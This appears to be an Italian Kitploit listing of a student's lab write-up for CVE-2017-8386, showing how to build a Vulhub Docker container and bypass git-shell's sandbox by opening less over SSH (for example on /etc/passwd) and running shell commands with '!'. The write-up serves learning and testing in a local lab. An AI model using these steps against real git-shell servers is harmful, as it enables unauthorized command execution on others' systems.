Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WHS3_vulhub — PoC per la vulnerabilità di bypass della sandbox di Git-Shell CVE-2017-8386. | Kitploit
Strumenti/GitHubGitHub/suz1n/whs3_vulhub
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubsuz1n/whs3_vulhub

WHS3_vulhub

PoC per la vulnerabilità di bypass della sandbox di Git-Shell CVE-2017-8386.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-8386: PoC del bypass della sandbox di git-shell per RCE

정수진(@suz1n)

Panoramica

Git-shell fornisce un ambiente che consente solo comandi git limitati tramite SSH. Tuttavia, in alcune versioni di git-shell (come la 2.12.2) esiste una vulnerabilità (CVE-2017-8386) che consente di aggirare la sandbox ed eseguire comandi di sistema abusando del comando less.

Questo report documenta l'esecuzione di un PoC per questa vulnerabilità e ne riassume il processo.

Configurazione dell'ambiente

Strumenti e versioni utilizzati

  • Docker: 24.0.7
  • Docker-Compose: v2.34.0
  • Sistema operativo host: macOS
  • Sistema operativo di destinazione: Ubuntu 16.04 (nel container)
  • Versione di Git: 2.12.2
  • Server SSH

Clonazione del repository Vulhub

git clone https://github.com/phith0n/vulhub.git

cd vulhub/git/CVE-2017-8386/ Image1

Configurazione di docker-compose.yml e Dockerfile

root@kitploit:~
• Immagine base Ubuntu 16.04
• Installazione di Git 2.12.2 dal sorgente
• Installazione ed esecuzione del server OpenSSH
• Configurazione dell'ambiente git-shell (creazione dell'utente git)

Build ed esecuzione del container

docker-compose build

docker-compose up -d

docker ps

root@kitploit:~
• Verifica dell'esecuzione del container (git-shell-cve-2017-8386)

Image2

Registrazione delle chiavi SSH e configurazione dell'ambiente

root@kitploit:~
1. Genera e copia id_rsa.pub in locale
2. Accedi all'interno del container e passa all'utente git
3. Registra authorized_keys

docker exec -it git-shell-cve-2017-8386 /bin/bash

chsh -s /bin/bash git

su git

mkdir -p ~/.ssh

chmod 700 ~/.ssh

touch ~/.ssh/authorized_keys

chmod 600 ~/.ssh/authorized_keys

vim ~/.ssh/authorized_keys

Image3

Installazione di pacchetti aggiuntivi

apt update

apt install less -y

apt install man-db -y

root@kitploit:~
• Installazione dei pacchetti less e man completata per eseguire il PoC

Procedura del PoC

Accesso SSH normale

ssh -p 3322 -i id_rsa -t [email protected] "less /etc/passwd"

• Accesso alla schermata di less riuscito

• Possibilità di eseguire comandi di sistema tramite il comando !

Esecuzione di comandi (bypass della sandbox)

• !id -> stampa l'ID utente e l'ID del gruppo first_execute.png

• !whoami -> utente corrente (git)

• !uname -a -> stampa le informazioni sul kernel di sistema

• !ls /home/git -> elenca i file della directory home di git

Analisi

root@kitploit:~
• L'ambiente git-shell impedisce agli utenti di eseguire comandi di sistema.
• Tuttavia, tramite il comando `git-upload-archive --help` è possibile richiamare internamente less.
• Il comando less supporta l'esecuzione di comandi shell di sistema tramite la funzionalità !.
• Di conseguenza, è possibile aggirare la sandbox di git-shell ed eseguire comandi arbitrari.

Riferimenti

• Blog Insinuator: https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/

• Repository GitHub Vulhub: https://github.com/phith0n/vulhub

Link al repository GitHub

https://github.com/suz1n/WHS3_vulhub

Scarica lo strumento